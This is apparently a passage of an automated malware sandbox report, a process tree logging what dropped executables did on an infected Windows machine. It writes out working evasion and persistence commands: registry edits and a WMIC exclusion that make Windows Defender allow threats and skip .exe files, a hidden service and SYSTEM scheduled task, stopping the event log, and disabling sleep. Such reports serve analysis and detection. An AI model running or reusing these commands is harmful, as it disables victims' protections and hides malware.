        forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:6100
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:6116
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:6132
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:3816
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:2356
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:1920
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:3324
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:2384
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:4868
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:3428
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3352
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:448
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m calc.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:2856
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:1900
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4520
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5248
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bjeWJKrHnPpdAGCduF" /SC once /ST 17:27:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSEB1.tmp\Install.exe\" bC /dxMdidE 525403 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:5624
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1044
        5⤵
        Program crash
        
        PID:5400
- C:\Users\Admin\Documents\SimpleAdobe\i0JJithUZkia7pknf7CtIhgb.exe
  C:\Users\Admin\Documents\SimpleAdobe\i0JJithUZkia7pknf7CtIhgb.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1284
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:4268
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:5124
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    PID:5200
  - - C:\ProgramData\IEBFHCAKFB.exe
      "C:\ProgramData\IEBFHCAKFB.exe"
      4⤵
      Executes dropped EXE
      PID:228
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:5936
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 296
        5⤵
        Program crash
        
        PID:5316
  - - C:\ProgramData\BKJKEBGDHD.exe
      "C:\ProgramData\BKJKEBGDHD.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5480
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:1652
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 276
        5⤵
        Program crash
        
        PID:5916
  - - C:\ProgramData\KEBGHCBAEG.exe
      "C:\ProgramData\KEBGHCBAEG.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5404
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        
        PID:4016
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4528
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5404 -s 280
        5⤵
        Program crash
        
        PID:4652
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\CBKJJJDHDGDA" & exit
      4⤵
      PID:4416
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:2384
- C:\Users\Admin\Documents\SimpleAdobe\9mjuM5End3qW0in8BBGuRAA1.exe
  C:\Users\Admin\Documents\SimpleAdobe\9mjuM5End3qW0in8BBGuRAA1.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1744
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:4948
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:1312
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5248
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2304
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:3900
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:5360
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5796
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:5800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4544

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5264

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 228 -ip 228
1⤵
PID:5232

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:3456
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5492
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:5292
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:2668
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:5116
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3744
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5480 -ip 5480
1⤵
PID:6104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5404 -ip 5404
1⤵
PID:4364

C:\Users\Admin\AppData\Local\Temp\7zSEB1.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSEB1.tmp\Install.exe bC /dxMdidE 525403 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1984
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:5420
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:5656
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:3672
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:2800
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:3436
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5496
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:5472
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5756
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:5372
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:5448
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:3456
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:5408
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:5784
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5140
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5920
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:4940
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:2668
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:4172
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1252
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4744
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5460
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5592
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5996
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1352
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5428
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:220
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5328
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4348
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5556
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:324
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3720
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6000
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1152
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1248
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
